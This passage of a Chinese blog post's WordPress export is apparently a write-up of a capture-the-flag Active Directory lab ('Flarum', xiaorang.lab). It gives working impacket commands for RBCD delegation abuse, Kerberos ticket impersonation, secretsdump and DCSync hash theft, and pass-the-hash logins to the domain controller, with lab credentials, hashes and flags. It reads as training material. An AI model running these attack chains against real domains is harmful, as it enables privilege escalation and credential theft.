proxychains4 -q bloodhound-python -u wangyun -p Adm12geC -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp<\/code><\/pre>\n![\"flarum_8\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_8.png\")
<\/p>\n
zhangxin\u5c5e\u4e8eACCOUNT OPERATORS\u7ec4\uff0c\u53ef\u4ee5\u5229\u7528RBCD\u8fdb\u884c\u63d0\u6743<\/p>\n
ACCOUNT OPERATORS\u7ec4\u6253RBCD<\/h4>\n
\u8001\u5957\u8def\uff0c\u521b\u5efa\u53d7\u63a7\u8ba1\u7b97\u673a\u8d26\u6237\uff0c\u540e\u7eed\u901a\u8fc7\u8be5\u8d26\u6237\u914d\u7f6e\u59d4\u6d3e\u6743\u9650<\/p>\n
proxychains4 -q impacket-addcomputer 'xiaorang.lab\/zhangxin:admin4qwY38cc' -computer-name 'simho$' -computer-pass 'whoami@123' -dc-ip 172.22.60.8<\/code><\/pre>\n\u914d\u7f6e RBCD \u59d4\u6d3e\u5173\u7cfb\uff0c\u5141\u8bb8 simho$<\/code> \u6a21\u62df 'FILESERVER$<\/code> \u4e0a\u7684\u4efb\u610f\u7528\u6237\uff08\u5982\u57df\u7ba1\u7406\u5458\uff09\uff0c\u4ece\u800c\u83b7\u53d6\u9ad8\u6743\u9650\u7968\u636e<\/p>\nproxychains4 -q impacket-rbcd 'xiaorang.lab\/zhangxin:admin4qwY38cc' -action write -delegate-from 'simho$' -delegate-to 'FILESERVER$' -dc-ip 172.22.60.8<\/code><\/pre>\n\u4f7f\u7528 impacket-getST<\/code> \u901a\u8fc7 S4U2Self \u548c S4U2Proxy \u534f\u8bae\uff0c\u4ee5 simho$<\/code> \u7684\u8eab\u4efd\u8bf7\u6c42 Administrator<\/code> \u7528\u6237\u7684 Kerberos \u670d\u52a1\u7968\u636e\uff08TGS\uff09<\/p>\nproxychains4 -q impacket-getST xiaorang.lab\/'simho$':'whoami@123' -spn cifs\/FILESERVER.xiaorang.lab -impersonate Administrator -dc-ip 172.22.60.8<\/code><\/pre>\n![\"flarum_9\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_9.png\")
<\/p>\n
\u8bbe\u7f6e Kerberos \u7968\u636e\u7f13\u5b58\uff0c\u6a2a\u5411\u79fb\u52a8\u5230Fileserver<\/code>\u673a\u5668\uff0c\u62ff\u5230\u7b2c\u4e09\u4e2aflag<\/p>\nexport KRB5CCNAME=administrator.ccache\n\nproxychains4 -q impacket-smbexec 'xiaorang.lab\/administrator@FILESERVER.xiaorang.lab' -target-ip 172.22.60.42 -codec gbk -shell-type powershell -no-pass -k<\/code><\/pre>\n![\"flarum_10\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_10.png\")
<\/p>\n
flag{611b8254-965f-428e-95fa-d33b9445bbfd}<\/code><\/pre>\nflag2 & flag4<\/h3>\nDCSync\u653b\u51fb<\/h4>\n
\u7ee7\u7eed\u5206\u6790bloodhound\uff0cFILESERVER \u673a\u5668\u62e5\u6709 DCSync \u6743\u9650\uff0c\u5e94\u8be5\u5c31\u662f\u9898\u76ee\u63cf\u8ff0\u63d0\u5230\u7684\u540e\u95e8<\/p>\n
![\"flarum_11\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_11.png\")
<\/p>\n
\u56e0\u6b64\u5148\u6293\u53d6\u8be5\u53f0\u673a\u5668\u54c8\u5e0c<\/p>\n
proxychains4 -q impacket-secretsdump -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8<\/code><\/pre>\n![\"flarum_12\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_12.png\")
<\/p>\n
XIAORANG\\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::<\/code><\/pre>\n\u63a5\u7740\u7528 FILESERVER \u673a\u5668\u8d26\u6237\u8fdb\u884c DCSync \u653b\u51fb<\/p>\n
proxychains4 -q impacket-secretsdump 'xiaorang.lab\/FILESERVER$@DC.xiaorang.lab' -target-ip 172.22.60.8 -dc-ip 172.22.60.8 -hashes :951d8a9265dfb652f42e5c8c497d70dc -just-dc-ntlm -user-status<\/code><\/pre>\n![\"flarum_13\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_13.png\")
<\/p>\n
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3cfdc08527ec4ab6aa3e630e79d349b<\/code><\/pre>\nPTH \u767b\u5f55\u57df\u63a7\u8ddfPC1<\/p>\n
proxychains4 -q impacket-smbexec -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab\/administrator@172.22.60.15 -codec gbk<\/code><\/pre>\n![\"flarum_14\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_14.png\")
<\/p>\n
flag{856c7dc8-46c4-46c6-a67e-521813c8a5ec}<\/code><\/pre>\nproxychains4 -q impacket-smbexec -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab\/administrator@172.22.60.8 -codec gbk<\/code><\/pre>\n![\"flarum_15\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_15.png\")
<\/p>\n
flag{515e8383-6669-4f36-a840-01e887dac615}<\/code><\/pre>\n<\/div>","protected":false},"excerpt":{"rendered":"
Flarum \u6d89\u53ca\u7684\u77e5\u8bc6\u70b9 Flarum\u540e\u53f0RCE openssl\u7684capabilities\u63d0\u6743 AS-REP […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-945","post","type-post","status-publish","format-standard","hentry","category-pentesting"],"views":754,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/945","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=945"}],"version-history":[{"count":1,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/945\/revisions"}],"predecessor-version":[{"id":947,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/945\/revisions\/947"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=945"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=945"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=945"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"flarum_1\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_1.png\")
<\/p>\n![\"flarum_2\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_2.png\")
<\/p>\n![\"flarum_3\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_3.png\")
<\/p>\n![\"flarum_4\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_4.png\")
<\/p>\n![\"flarum_5\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_5.png\")
<\/p>\n![\"flarum_6\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_6.png\")
<\/p>\n![\"flarum_7\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/flarum_7.png\")
<\/p>\n